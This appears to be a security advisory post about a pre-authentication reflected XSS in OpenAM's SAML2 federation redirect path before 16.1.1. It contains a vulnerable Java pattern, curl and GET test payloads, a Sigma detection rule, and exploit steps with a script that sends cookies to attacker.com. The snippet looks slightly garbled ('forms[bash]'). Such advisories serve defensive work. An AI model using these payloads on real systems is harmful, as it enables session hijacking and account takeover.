Listen to this Post
The vulnerability arises from a failure to consistently apply output encoding across certain SAML2 federation endpoints when rendering user-supplied parameters into HTML responses. Under a non-default configuration used in clustered deployments, this inconsistency leads to a pre-authentication reflected cross-site scripting (XSS) flaw within the OpenAM origin.
At the core of the issue is the `FSUtils.postToTarget` method, which is responsible for constructing and forwarding HTTP POST requests to target URLs during SAML2 federation flows. In a typical SAML2 cluster setup, OpenAM leverages a “cookie-hash-redirect” mechanism to maintain session stickiness across load-balanced nodes. This mechanism involves hashing a cookie value and embedding it into a redirect URL to ensure that subsequent requests are routed to the correct cluster node.
When a SAML2 request is processed, the `FSUtils.postToTarget` method builds a redirect response that includes user-supplied parameters—such as the `RelayState` or the `Target` URL—directly into the HTML output without proper contextual escaping. While some federation endpoints apply encoding, the SAML2 cluster cookie-hash-redirect path bypasses these safeguards. Specifically, the `postToTarget` method generates an HTML form with hidden input fields whose values are derived from the original request parameters. These values are not sanitized or encoded, allowing an attacker to inject arbitrary JavaScript.
The attack vector is pre-authentication, meaning no valid session is required. An attacker can craft a malicious SAML2 authentication request or a direct HTTP GET/POST to a vulnerable federation endpoint, embedding a payload in a parameter like RelayState. When the OpenAM server processes this request, it constructs a redirect response containing the unsanitized payload. The response is sent back to the user’s browser, where the injected script executes in the context of the OpenAM domain.
This issue is particularly dangerous in clustered environments because the cookie-hash-redirect logic may append the payload to multiple redirect hops, increasing the likelihood of successful exploitation. The lack of output encoding in this specific code path violates secure coding practices (CWE-79) and enables an attacker to steal session cookies, perform unauthorized actions, or defraud users.
The vulnerability affects all OpenAM versions prior to 16.1.1. The fix, implemented in version 16.1.1, introduces proper HTML entity encoding for all user-supplied parameters in the federation redirect path, ensuring that any injected script is neutralized before being rendered.
DailyCVE Form:
Platform: ……. OpenAM (Open Identity Platform)
Version: …….. < 16.1.1
Vulnerability :.. Pre-authentication Reflected XSS
Severity: ……. Low
date: ………. Jun 22, 2026
Prediction: ….. Jul 6, 2026
What Undercode Say: Analytics
Affected Endpoints and Parameters
– `/openam/saml2/jsp/…` (various federation JSPs)
– RelayState, Target, `acsUrl` parameters
– `FSUtils.postToTarget` method in `com.sun.identity.saml2.common.FSUtils`
Bash Command to Test for Vulnerability
curl -k "https://openam.example.com/openam/saml2/jsp/spSSOInit.jsp?metaAlias=/sp&RelayState=<script>alert('XSS')</script>" -I
Sample Malicious Request
GET /openam/saml2/jsp/spSSOInit.jsp?metaAlias=/sp&RelayState=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1 Host: openam.example.com
Code Snippet of Vulnerable Pattern (Simplified)
// FSUtils.postToTarget (vulnerable excerpt)
public void postToTarget(HttpServletRequest request, HttpServletResponse response, String target, String relayState) {
StringBuilder html = new StringBuilder();
html.append("<html><body onload=\"document.forms[bash].submit()\">");
html.append("
<form method=\"post\" action=\"").append(target).append("\">");
// relayState is directly concatenated without encoding
html.append("<input type=\"hidden\" name=\"RelayState\" value=\"").append(relayState).append("\">");
html.append("</form>
</body></html>");
response.getWriter().write(html.toString());
}
Detection Rule (Sigma)
OpenAM SAML2 XSS Attempt logsource: category: webserver detection: selection: c-uri|contains: - 'RelayState=<script' - 'RelayState=%3Cscript' condition: selection
How Exploit:
- Identify Target – Locate an OpenAM instance with SAML2 federation enabled and configured in a cluster with cookie-hash-redirect.
- Craft Payload – Create a malicious SAML2 authentication request or directly access a vulnerable endpoint (e.g.,
spSSOInit.jsp) with a `RelayState` parameter containing JavaScript, e.g.,<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>. - Deliver Attack – Send the crafted URL to a victim via email, phishing, or embed in an iframe.
- Trigger Execution – When the victim clicks the link, the OpenAM server processes the request and returns an HTML form with the unsanitized payload. The browser automatically submits the form, executing the script in the context of the OpenAM domain.
- Exfiltrate Data – The script can steal session cookies, tokens, or perform actions on behalf of the victim.
Protection:
- Upgrade to OpenAM version 16.1.1 or later, which includes proper output encoding for all federation parameters.
- Apply Workaround – For versions prior to 16.1.1, manually configure a Web Application Firewall (WAF) rule to block requests containing suspicious patterns in
RelayState,Target, or similar parameters. - Enable Strict Output Encoding – Ensure that all federation endpoints use `StringEscapeUtils.escapeHtml4()` or equivalent before rendering user input.
- Disable Unused Federation Endpoints – If SAML2 federation is not required, disable or restrict access to the vulnerable JSPs.
- Monitor Logs – Implement logging and alerting for unusual `RelayState` values that contain script tags or encoded HTML.
Impact:
- Confidentiality – An attacker can steal session cookies and impersonate authenticated users, potentially gaining unauthorized access to protected resources.
- Integrity – The attacker can perform actions on behalf of the victim, such as changing account settings or initiating fraudulent transactions.
- Availability – While not directly impacting availability, the XSS can be used to redirect users to malicious sites, leading to phishing or further compromise.
- Attack Complexity – Low; the attack requires only a crafted URL and does not need authentication.
- Privilege Escalation – The vulnerability is pre-authentication, meaning an unauthenticated attacker can target any user who clicks the malicious link, potentially escalating privileges to that user’s level.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
